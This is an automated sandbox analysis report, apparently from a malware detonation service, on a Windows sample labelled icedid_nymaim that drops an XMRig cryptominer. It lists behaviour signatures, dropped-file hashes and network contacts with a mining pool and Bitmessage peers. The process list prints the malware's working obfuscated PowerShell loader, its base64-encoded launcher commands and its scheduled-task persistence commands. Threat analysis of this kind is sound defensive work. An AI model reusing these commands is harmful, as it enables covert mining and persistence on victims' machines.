Analysis Overview
SHA256
23d959b6953113b4c9b674c6f8eb41d65e8504d3db4f8c3045df4a59563b2c7b
Threat Level: Known bad
The file 2024-10-25_64bf0cc952e3709e7b47e411780a94c8_icedid_nymaim was found to be: Known bad.
Malicious Activity Summary
Xmrig family
xmrig
XMRig Miner payload
Downloads MZ/PE file
Blocklisted process makes network request
Deletes itself
Loads dropped DLL
Executes dropped EXE
Checks computer location settings
Obfuscated Files or Information: Command Obfuscation
Unsigned PE
System Location Discovery: System Language Discovery
Command and Scripting Interpreter: PowerShell
Detects Pyinstaller
Enumerates physical storage devices
Suspicious behavior: EnumeratesProcesses
Suspicious use of SetWindowsHookEx
Suspicious use of FindShellTrayWindow
Suspicious use of SendNotifyMessage
Delays execution with timeout.exe
Scheduled Task/Job: Scheduled Task
Suspicious use of WriteProcessMemory
Suspicious use of AdjustPrivilegeToken
MITRE ATT&CK
Enterprise Matrix V15
Analysis: static1
Detonation Overview
Reported
2024-10-25 13:31
Signatures
Unsigned PE
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
Analysis: behavioral1
Detonation Overview
Submitted
2024-10-25 13:31
Reported
2024-10-25 13:33
Platform
win7-20240708-en
Max time kernel
119s
Max time network
120s
Command Line
Signatures
Deletes itself
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\cmd.exe | N/A |
Executes dropped EXE
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\2024-10-25_64bf0cc952e3709e7b47e411780a94c8_icedid_nymaim.exe | N/A |
Loads dropped DLL
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\cmd.exe | N/A |
Enumerates physical storage devices
System Location Discovery: System Language Discovery
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\schtasks.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\2024-10-25_64bf0cc952e3709e7b47e411780a94c8_icedid_nymaim.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\timeout.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\2024-10-25_64bf0cc952e3709e7b47e411780a94c8_icedid_nymaim.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\chcp.com | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\schtasks.exe | N/A |
Delays execution with timeout.exe
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\timeout.exe | N/A |
Scheduled Task/Job: Scheduled Task
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\schtasks.exe | N/A |
Suspicious use of SetWindowsHookEx
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\2024-10-25_64bf0cc952e3709e7b47e411780a94c8_icedid_nymaim.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\2024-10-25_64bf0cc952e3709e7b47e411780a94c8_icedid_nymaim.exe | N/A |
Suspicious use of WriteProcessMemory
Processes
C:\Users\Admin\AppData\Local\Temp\2024-10-25_64bf0cc952e3709e7b47e411780a94c8_icedid_nymaim.exe
"C:\Users\Admin\AppData\Local\Temp\2024-10-25_64bf0cc952e3709e7b47e411780a94c8_icedid_nymaim.exe"
C:\Windows\SysWOW64\cmd.exe
cmd /c ""C:\Users\Admin\AppData\Local\Temp\zbe20241025133117300.bat" "
C:\Windows\SysWOW64\cmd.exe
cmd /c ""C:\Users\Admin\AppData\Local\Temp\zb20241025133117300.bat" "
C:\Windows\SysWOW64\chcp.com
chcp 1251
C:\Windows\SysWOW64\schtasks.exe
Schtasks.Exe /delete /tn "Maintenance" /f
C:\Windows\SysWOW64\schtasks.exe
Schtasks.Exe /create /tn "Maintenance" /xml "C:\Users\Admin\AppData\Local\Temp\zx20241025133117300.xml"
C:\Users\Admin\AppData\Local\Temp\2024-10-25_64bf0cc952e3709e7b47e411780a94c8_icedid_nymaim.exe
"C:\Users\Admin\AppData\Local\Temp\2024-10-25_64bf0cc952e3709e7b47e411780a94c8_icedid_nymaim.exe"
C:\Windows\SysWOW64\timeout.exe
timeout /t 3 /nobreak
Network
Files
C:\Users\Admin\AppData\Local\Temp\zbe20241025133117300.bat
| MD5 | d64fbef3ceaeec59a5aaff6380f4c7b0 |
| SHA1 | 78ecfc9a408bde923acefedca44fbf3365407af4 |
| SHA256 | aac16463b0975f49662a83ecdd2a7d9aeeb2e75019f775b19d3bcf11358fa1aa |
| SHA512 | 548dc8e13f40dc80e265177963afdc0cc2864a948e50440e289f884a7bf39f26630d78b972cfeb0848294ae9723eb92fd5d26961ddea686f721b910a7f5895e7 |
C:\Users\Admin\AppData\Local\Temp\zb20241025133117300.bat
| MD5 | f2e439d133bea259fd8e5bff317f26cf |
| SHA1 | 7dbe3e43b6b69088020fecfa53f876fd8fc56a5a |
| SHA256 | d32a4cde9394cb947a912dc17fbfead8be1864181b03847a6363ccdb2f50ec85 |
| SHA512 | 27fab4caf661ec14856ee9f5df55b806288199cf9fbd5d30aaf72f0bce28b0319fe7c54ad8510d1f4e7c27f687bbe28dbc88bdba6941163d5555862dfcfcd501 |
C:\Users\Admin\AppData\Local\Temp\ze20241025133117300.tmp
| MD5 | 5e257f0de14b5df97d2d612fc16bdba9 |
| SHA1 | 3909ad43252d24ffe20d11dddd9c2dcea8bb8032 |
| SHA256 | 5976d64cdca51156d14e5c4a7025e653942ab98948347f7a54edb643cb4d755f |
| SHA512 | f55ad6949c661772a9bf10bfcad3af4ddf62192d54047b1c7588e928a70f894791e7e5b56659c880d9d6f78eb6e171f9dbd99c416ac268836084f33478f3a4b7 |
C:\Users\Admin\AppData\Local\Temp\zx20241025133117300.xml
| MD5 | a509440011c1cd28069fae8570804731 |
| SHA1 | f9b308d36c726fb7613af7466fe6f5572dc81213 |
| SHA256 | be48d33a2dde30ef7f4dfd3bfd54ce8475822cb89073f5e52a70917ca264dfdc |
| SHA512 | e9fc7536a8c9e5de64686fb568ab76305e800ce8755435dc3fd536e411bef3f62939d6d2da01ae9ceb59bfaf3988fe22253e3797dc026c7b259e1cd339fade0f |
Analysis: behavioral2
Detonation Overview
Submitted
2024-10-25 13:31
Reported
2024-10-25 13:33
Platform
win10v2004-20241007-en
Max time kernel
150s
Max time network
150s
Command Line
Signatures
Xmrig family
xmrig
XMRig Miner payload
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
Blocklisted process makes network request
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
Downloads MZ/PE file
Checks computer location settings
| Description | Indicator | Process | Target |
| Key value queried | \REGISTRY\USER\S-1-5-21-3350944739-639801879-157714471-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\AppData\Roaming\Maintenance\apps\maintenance.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-3350944739-639801879-157714471-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\AppData\Local\Temp\2024-10-25_64bf0cc952e3709e7b47e411780a94c8_icedid_nymaim.exe | N/A |
Executes dropped EXE
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\2024-10-25_64bf0cc952e3709e7b47e411780a94c8_icedid_nymaim.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Roaming\Maintenance\apps\maintenance.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\4f4647414455534547205988590859817822720016\idle_maintenance.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Roaming\Maintenance\wmntnnc | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Roaming\Maintenance\wmntnnc | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Roaming\Maintenance\apps\maintenance.exe | N/A |
Loads dropped DLL
Obfuscated Files or Information: Command Obfuscation
Command and Scripting Interpreter: PowerShell
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
Detects Pyinstaller
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
Enumerates physical storage devices
System Location Discovery: System Language Discovery
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\timeout.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Roaming\Maintenance\wmntnnc | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\schtasks.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\schtasks.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Roaming\Maintenance\apps\maintenance.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Roaming\Maintenance\wmntnnc | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Roaming\Maintenance\apps\maintenance.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\2024-10-25_64bf0cc952e3709e7b47e411780a94c8_icedid_nymaim.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\chcp.com | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\2024-10-25_64bf0cc952e3709e7b47e411780a94c8_icedid_nymaim.exe | N/A |
Delays execution with timeout.exe
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\timeout.exe | N/A |
Scheduled Task/Job: Scheduled Task
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\schtasks.exe | N/A |
Suspicious behavior: EnumeratesProcesses
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeLockMemoryPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\4f4647414455534547205988590859817822720016\idle_maintenance.exe | N/A |
| Token: SeLockMemoryPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\4f4647414455534547205988590859817822720016\idle_maintenance.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious use of FindShellTrayWindow
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Roaming\Maintenance\wmntnnc | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Roaming\Maintenance\wmntnnc | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Roaming\Maintenance\wmntnnc | N/A |
Suspicious use of SendNotifyMessage
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Roaming\Maintenance\wmntnnc | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Roaming\Maintenance\wmntnnc | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Roaming\Maintenance\wmntnnc | N/A |
Suspicious use of SetWindowsHookEx
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\2024-10-25_64bf0cc952e3709e7b47e411780a94c8_icedid_nymaim.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\2024-10-25_64bf0cc952e3709e7b47e411780a94c8_icedid_nymaim.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Roaming\Maintenance\wmntnnc | N/A |
Suspicious use of WriteProcessMemory
Processes
C:\Users\Admin\AppData\Local\Temp\2024-10-25_64bf0cc952e3709e7b47e411780a94c8_icedid_nymaim.exe
"C:\Users\Admin\AppData\Local\Temp\2024-10-25_64bf0cc952e3709e7b47e411780a94c8_icedid_nymaim.exe"
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\zbe20241025133118446.bat" "
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\zb20241025133118446.bat" "
C:\Windows\SysWOW64\schtasks.exe
Schtasks.Exe /delete /tn "Maintenance" /f
C:\Windows\SysWOW64\chcp.com
chcp 1251
C:\Windows\SysWOW64\schtasks.exe
Schtasks.Exe /create /tn "Maintenance" /xml "C:\Users\Admin\AppData\Local\Temp\zx20241025133118446.xml"
C:\Users\Admin\AppData\Local\Temp\2024-10-25_64bf0cc952e3709e7b47e411780a94c8_icedid_nymaim.exe
"C:\Users\Admin\AppData\Local\Temp\2024-10-25_64bf0cc952e3709e7b47e411780a94c8_icedid_nymaim.exe"
C:\Windows\SysWOW64\timeout.exe
timeout /t 3 /nobreak
C:\Users\Admin\AppData\Roaming\Maintenance\apps\maintenance.exe
C:\Users\Admin\AppData\Roaming\Maintenance\apps\maintenance.exe .
C:\Users\Admin\AppData\Local\Temp\4f4647414455534547205988590859817822720016\idle_maintenance.exe
C:\Users\Admin\AppData\Local\Temp\4f4647414455534547205988590859817822720016\idle_maintenance.exe
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell -ExecutionPolicy Bypass -c "if($host.version.major -lt 3){exit}$d =[IO.File]::ReadAllBytes('C:\Users\Admin\AppData\Roaming\Maintenance\mod');$l=$d.Count;$m = New-Object Byte[] $l;[byte[]] $x=6,237,36,106,196,101,232,222;$j=0;for($i=0;$i -lt $l;$i++){$m[$i]=$d[$i] -bxor $x[$j];$j++;if($j -ge 8){$j=0}}$a = New-Object IO.MemoryStream(,$m);$b = New-Object IO.StreamReader(New-Object IO.Compression.DeflateStream($a,[IO.Compression.CompressionMode]::Decompress));$c=$b.ReadToEnd();$b.Close();$a.Close();Invoke-Expression($c)"
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass -encodedCommand ZgB1AG4AYwB0AGkAbwBuACAAYwBoAGsAcAByAGMAKAAkAHAAKQB7AA0ACgAgACgAKABHAGUAdAAtAFAAcgBvAGMAZQBzAHMAIAB8ACAAUwBlAGwAZQBjAHQALQBPAGIAagBlAGMAdAAgAFAAcgBvAGMAZQBzAHMATgBhAG0AZQApAC4AUAByAG8AYwBlAHMAcwBOAGEAbQBlACAALQBjAG8AbgB0AGEAaQBuAHMAIAAiACQAcAAiACkADQAKAH0ADQAKAGkAZgAoAGMAaABrAHAAcgBjACgAJwBtAGEAaQBuAHQAZQBuAGEAbgBjAGUAJwApACkAewANAAoAIABXAGEAaQB0AC0AUAByAG8AYwBlAHMAcwAgAC0ATgBhAG0AZQAgACcAbQBhAGkAbgB0AGUAbgBhAG4AYwBlACcADQAKACAAaQBmACgAYwBoAGsAcAByAGMAKAAnAHcAbQBuAHQAbgBuAGMAJwApACkAewANAAoAIAAgAFMAdABvAHAALQBQAHIAbwBjAGUAcwBzACAALQBOAGEAbQBlACAAJwB3AG0AbgB0AG4AbgBjACcAIAAtAEYAbwByAGMAZQANAAoAIAAgAFcAYQBpAHQALQBQAHIAbwBjAGUAcwBzACAALQBOAGEAbQBlACAAJwB3AG0AbgB0AG4AbgBjACcADQAKACAAfQAgAA0ACgAgACQAcAByAHQAYwA9ACAAWwBEAGkAYQBnAG4AbwBzAHQAaQBjAHMALgBQAHIAbwBjAGUAcwBzAF0AQAB7AA0ACgAgACAAUwB0AGEAcgB0AEkAbgBmAG8AIAA9ACAAWwBEAGkAYQBnAG4AbwBzAHQAaQBjAHMALgBQAHIAbwBjAGUAcwBzAFMAdABhAHIAdABJAG4AZgBvAF0AQAB7AA0ACgAgACAAVQBzAGUAUwBoAGUAbABsAEUAeABlAGMAdQB0AGUAIAA9ACAAJABmAGEAbABzAGUADQAKACAAIABGAGkAbABlAE4AYQBtAGUAIAA9ACAAJwBDADoAXABVAHMAZQByAHMAXABBAGQAbQBpAG4AXABBAHAAcABEAGEAdABhAFwAUgBvAGEAbQBpAG4AZwBcAE0AYQBpAG4AdABlAG4AYQBuAGMAZQBcAGEAcABwAHMAXABtAGEAaQBuAHQAZQBuAGEAbgBjAGUALgBlAHgAZQAnAA0ACgAgACAAQQByAGcAdQBtAGUAbgB0AHMAIAA9ACAAJwAtACcADQAKACAAIABDAHIAZQBhAHQAZQBOAG8AVwBpAG4AZABvAHcAIAA9ACAAJABmAGEAbABzAGUADQAKACAAIAB9AA0ACgAgAH0ADQAKACAAJABwAHIAdABjAC4AUwB0AGEAcgB0ACgAKQAgAHwAIABPAHUAdAAtAE4AdQBsAGwADQAKACAAaQBmACgAYwBoAGsAcAByAGMAKAAnAHAAbwB3AGUAcgBzAGgAZQBsAGwAJwApACkAewBTAHQAbwBwAC0AUAByAG8AYwBlAHMAcwAgAC0AcAByAG8AYwBlAHMAcwBuAGEAbQBlACAAJwBwAG8AdwBlAHIAcwBoAGUAbABsACcAIAAtAEYAbwByAGMAZQB9AA0ACgAgAGUAeABpAHQADQAKAH0A
C:\Users\Admin\AppData\Roaming\Maintenance\wmntnnc
".\wmntnnc"
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass -encodedCommand JABwAGEAdABoAD0AJwBDADoAXABVAHMAZQByAHMAXABBAGQAbQBpAG4AXABBAHAAcABEAGEAdABhAFwATABvAGMAYQBsAFwAVABlAG0AcAAnAA0ACgANAAoAJABiAGkAbgBmAG4APQAwAA0ACgBkAG8AIAB7AA0ACgAgACQAZgBpAGwAZQBzACAAPQAgAEcAZQB0AC0AQwBoAGkAbABkAEkAdABlAG0AIAAtAFAAYQB0AGgAIAAkAHAAYQB0AGgAIAAtAEYAaQBsAHQAZQByACAAXwBNAEUASQAqAA0ACgAgAEYAbwByAEUAYQBjAGgAIAAoACQAZgBuACAAaQBuACAAJABmAGkAbABlAHMAKQAgAHsADQAKACAAIAAkAGIAaQBuAGYAbgA9ACQAcABhAHQAaAArACcAXAAnACsAJABmAG4ALgBuAGEAbQBlACsAJwBcAFEAdABHAHUAaQA0AC4AZABsAGwAJwANAAoAIAB9AA0ACgAgAGkAZgAoAC0AbgBvAHQAIAAkAGIAaQBuAGYAbgApAHsAUwB0AGEAcgB0AC0AUwBsAGUAZQBwACAALQBNAGkAbABsAGkAcwBlAGMAbwBuAGQAcwAgADEAMAAwAH0ADQAKAH0ADQAKAHcAaABpAGwAZQAoAC0AbgBvAHQAIAAkAGIAaQBuAGYAbgApAA0ACgANAAoAdwBoAGkAbABlACgALQBuAG8AdAAgAFsASQBPAC4ARgBpAGwAZQBdADoAOgBFAHgAaQBzAHQAcwAoACQAYgBpAG4AZgBuACkAKQB7AA0ACgAgAFMAdABhAHIAdAAtAFMAbABlAGUAcAAgAC0ATQBpAGwAbABpAHMAZQBjAG8AbgBkAHMAIAAxADAAMAANAAoAfQANAAoADQAKACQAZgBzAD0AMAANAAoAZABvAHsADQAKACAAdAByAHkAewAkAGYAcwAgAD0AIABbAEkATwAuAEYAaQBsAGUAXQA6ADoATwBwAGUAbgBXAHIAaQB0AGUAKAAkAGIAaQBuAGYAbgApAH0ADQAKACAAYwBhAHQAYwBoAHsAJABmAHMAPQAwAH0ADQAKACAAaQBmACgALQBuAG8AdAAgACQAZgBzACkAewBTAHQAYQByAHQALQBTAGwAZQBlAHAAIAAtAE0AaQBsAGwAaQBzAGUAYwBvAG4AZABzACAAMQAwADAAfQANAAoAfQANAAoAdwBoAGkAbABlACgALQBuAG8AdAAgACQAZgBzACkADQAKAA0ACgAkAGEAPQA1ADEANwA2ADEAOAA2AA0ACgAkAG4APQA0AA0ACgAkAGYAcwAuAFMAZQBlAGsAKAAkAGEALABbAEkATwAuAFMAZQBlAGsATwByAGkAZwBpAG4AXQA6ADoAQgBlAGcAaQBuACkAIAB8ACAATwB1AHQALQBOAHUAbABsAA0ACgBmAG8AcgAoACQAaQA9ADAAOwAkAGkAIAAtAGwAdAAgACQAbgA7ACQAaQArACsAKQB7ACQAZgBzAC4AVwByAGkAdABlAEIAeQB0AGUAKAAwACkAfQANAAoAJABmAHMALgBDAGwAbwBzAGUAKAApACAADQAKAGUAeABpAHQA
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass -encodedCommand dwBoAGkAbABlACgALQBuAG8AdAAgAFsASQBPAC4ARgBpAGwAZQBdADoAOgBFAHgAaQBzAHQAcwAoACcALgBcAHMAaQBuAGcAbABlAHQAbwBuAC4AbABvAGMAawAnACkAKQB7AA0ACgAgAFMAdABhAHIAdAAtAFMAbABlAGUAcAAgAC0ATQBpAGwAbABpAHMAZQBjAG8AbgBkAHMAIAAxADAAMAANAAoAfQANAAoAZgBvAHIAKAAkAGkAPQAwADsAJABpACAALQBsAHQAIAAxADAAMAAwADsAJABpACsAKwApAA0ACgB7AA0ACgAgACQAcAByAHQAYwA9ACAAWwBEAGkAYQBnAG4AbwBzAHQAaQBjAHMALgBQAHIAbwBjAGUAcwBzAF0AQAB7AA0ACgAgACAAUwB0AGEAcgB0AEkAbgBmAG8AIAA9ACAAWwBEAGkAYQBnAG4AbwBzAHQAaQBjAHMALgBQAHIAbwBjAGUAcwBzAFMAdABhAHIAdABJAG4AZgBvAF0AQAB7AA0ACgAgACAAVQBzAGUAUwBoAGUAbABsAEUAeABlAGMAdQB0AGUAIAA9ACAAJABmAGEAbABzAGUADQAKACAAIABGAGkAbABlAE4AYQBtAGUAIAA9ACAAJwBDADoAXABVAHMAZQByAHMAXABBAGQAbQBpAG4AXABBAHAAcABEAGEAdABhAFwAUgBvAGEAbQBpAG4AZwBcAE0AYQBpAG4AdABlAG4AYQBuAGMAZQBcAGEAcABwAHMAXABtAGEAaQBuAHQAZQBuAGEAbgBjAGUALgBlAHgAZQAnAA0ACgAgACAAQQByAGcAdQBtAGUAbgB0AHMAIAA9ACAAJwArACcADQAKACAAIABDAHIAZQBhAHQAZQBOAG8AVwBpAG4AZABvAHcAIAA9ACAAJABmAGEAbABzAGUADQAKACAAIAB9AA0ACgAgAH0ADQAKACAAJABwAHIAdABjAC4AUwB0AGEAcgB0ACgAKQAgAHwAIABPAHUAdAAtAE4AdQBsAGwADQAKACAAJABwAHIAdABjAC4AVwBhAGkAdABGAG8AcgBFAHgAaQB0ACgAKQANAAoAIAANAAoAIABpAGYAKAAkAHAAcgB0AGMALgBFAHgAaQB0AEMAbwBkAGUAIAAtAGUAcQAgADcANwA3ACkAewBiAHIAZQBhAGsAfQANAAoAIABTAHQAYQByAHQALQBTAGwAZQBlAHAAIAAtAE0AaQBsAGwAaQBzAGUAYwBvAG4AZABzACAAMQAwADAADQAKACAAZQB4AGkAdAANAAoAfQA=
C:\Users\Admin\AppData\Roaming\Maintenance\wmntnnc
".\wmntnnc"
C:\Users\Admin\AppData\Roaming\Maintenance\apps\maintenance.exe
"C:\Users\Admin\AppData\Roaming\Maintenance\apps\maintenance.exe" +
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | 13.86.106.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 0.205.248.87.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 71.159.190.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 95.221.229.192.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 28.118.140.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 200.163.202.172.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 18.31.95.13.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 69.190.18.2.in-addr.arpa | udp |
| US | 8.8.8.8:53 | pool.supportxmr.com | udp |
| FR | 141.94.96.195:3333 | pool.supportxmr.com | tcp |
| US | 8.8.8.8:53 | 195.96.94.141.in-addr.arpa | udp |
| US | 8.8.8.8:53 | pool.supportxmr.com | udp |
| FR | 141.94.96.195:3333 | pool.supportxmr.com | tcp |
| US | 8.8.8.8:53 | github.com | udp |
| GB | 20.26.156.215:443 | github.com | tcp |
| US | 8.8.8.8:53 | objects.githubusercontent.com | udp |
| US | 185.199.110.133:443 | objects.githubusercontent.com | tcp |
| US | 8.8.8.8:53 | 215.156.26.20.in-addr.arpa | udp |
| US | 185.199.110.133:443 | objects.githubusercontent.com | tcp |
| US | 8.8.8.8:53 | 133.110.199.185.in-addr.arpa | udp |
| N/A | 127.0.0.1:8442 | tcp | |
| US | 8.8.8.8:53 | bootstrap8080.bitmessage.org | udp |
| US | 8.8.8.8:53 | bootstrap8444.bitmessage.org | udp |
| DE | 5.45.99.75:8444 | tcp | |
| RO | 185.158.248.216:8444 | bootstrap8444.bitmessage.org | tcp |
| DE | 178.11.46.221:8444 | tcp | |
| FR | 85.25.152.9:8444 | bootstrap8444.bitmessage.org | tcp |
| DE | 85.114.135.102:8444 | bootstrap8444.bitmessage.org | tcp |
| DE | 85.180.139.241:8444 | tcp | |
| CH | 185.19.31.46:8080 | bootstrap8080.bitmessage.org | tcp |
| US | 24.188.198.204:8111 | tcp | |
| US | 75.167.159.54:8444 | tcp | |
| GB | 109.147.204.113:1195 | tcp | |
| RU | 95.165.168.168:8444 | tcp | |
| ES | 194.164.163.84:8444 | bootstrap8444.bitmessage.org | tcp |
| US | 8.8.8.8:53 | 102.135.114.85.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 9.152.25.85.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 216.248.158.185.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 84.163.164.194.in-addr.arpa | udp |
| CA | 158.69.63.42:8080 | bootstrap8080.bitmessage.org | tcp |
| US | 158.222.217.190:8080 | tcp | |
| US | 8.8.8.8:53 | 42.63.69.158.in-addr.arpa | udp |
| GB | 178.62.12.187:8448 | tcp | |
| CH | 185.19.31.46:8080 | bootstrap8080.bitmessage.org | tcp |
| BR | 200.206.120.218:8444 | tcp | |
| GB | 104.238.172.254:65532 | tcp | |
| IN | 150.129.250.164:8444 | tcp | |
| AU | 124.191.165.87:8444 | tcp | |
| VN | 115.75.26.197:8444 | tcp | |
| KZ | 2.135.86.220:8444 | tcp | |
| US | 194.163.44.195:8444 | tcp | |
| IN | 110.227.219.216:8444 | tcp | |
| CH | 194.182.189.194:8444 | tcp | |
| RU | 176.194.24.209:8444 | tcp | |
| CN | 175.0.123.79:2841 | tcp | |
| RU | 5.227.186.88:8444 | tcp | |
| DE | 145.239.0.21:8459 | tcp | |
| N/A | 127.0.0.1:8336 | tcp | |
| US | 8.8.8.8:53 | 194.189.182.194.in-addr.arpa | udp |
| BR | 181.220.215.192:8444 | tcp | |
| US | 168.203.20.105:8444 | tcp | |
| CN | 175.0.122.90:2820 | tcp | |
| BR | 186.248.225.42:8444 | tcp | |
| NL | 213.152.161.133:65518 | tcp | |
| MX | 187.131.162.98:8444 | tcp | |
